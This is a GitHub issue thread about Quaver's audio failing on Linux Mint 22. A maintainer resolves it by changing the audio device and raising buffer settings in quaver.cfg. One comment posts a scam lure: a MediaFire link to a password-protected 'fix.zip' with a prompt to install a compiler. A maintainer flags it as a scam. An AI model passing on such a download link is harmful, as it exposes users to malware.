### ISSUE TITLE
Audio is completely broken and levels won't play when running natively on Linux Mint 22

### ISSUE THREAD

**Issue by SomeRandomGamer2** [Quaver/Quaver#4294]
### Describe the bug

When I open the game, the audio works for a second and then it's completely gone. When I try to play a level, the notes completely freeze. 

I am using an external sound card (EPOS GSX 300)

OS: Linux Mint 22 x86_64 
Kernel: 6.8.0-38-generic

### To Reproduce

1. Open the game

### Expected behavior

When I played the game on EndeavourOS, it worked perfectly fine. No idea why it doesn't work on Mint.

### Log Files

Here are both the log files:

[network.log](https://github.com/user-attachments/files/17177466/network.log)
[runtime.log](https://github.com/user-attachments/files/17177467/runtime.log)

**Comment by SagarChandra07** [comment]
I think this will help you.
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive password: changeme
If you don't have the c compliator, install it.(gcc or clang)

**Comment by SomeRandomGamer2** [comment]
Sorry I don't get exactly what I'm supposed to do with this, still relatively new to linux. I have downloaded the zip and extracted it to a folder. What do I do with it now?

**Comment by Emik03** [comment]
@SomeRandomGamer2 That is a scam, please delete that zip.

Try changing the audio device in the option menu. (CTRL+O)

**Comment by Emik03** [comment]
If the audio works on one of the devices but is constantly cutting out, try changing the following parameters in `./quaver.cfg` (relative to installation of Quaver):
```ini
DevicePeriod = 25
DeviceBufferLengthMultiplier = 10
```

You may increase this value if you still experience stuttering audio, or lower it for more responsive audio.

**Comment by SomeRandomGamer2** [comment]
Deleted the zip. Changing these values in the config file seems to have fixed the audio issue! Thanks! Something weird now thought that's occuring is specifically the hitsounds happen too late after pressing a note. It doesn't affect my accuracy, but the hitsounds are offset from everything else.

**Comment by Emik03** [comment]
That's unavoidable. This parameter is how much time is given before you can hear something, in this case 25 * 10 = 250ms. Music is automatically offset because we know what the audio is ahead, but hitsounds are based on user input. #4236 already talks about having a toggle to play hitsounds based on the note time and not user input, which would fix this problem. For now you need to mute hitsounds. You may close the issue if you have no further questions.

**Comment by SomeRandomGamer2** [comment]
Alright, I'm perfectly fine with playing with no hitsounds so it's alright. Again, thanks for the help! Closing this issue
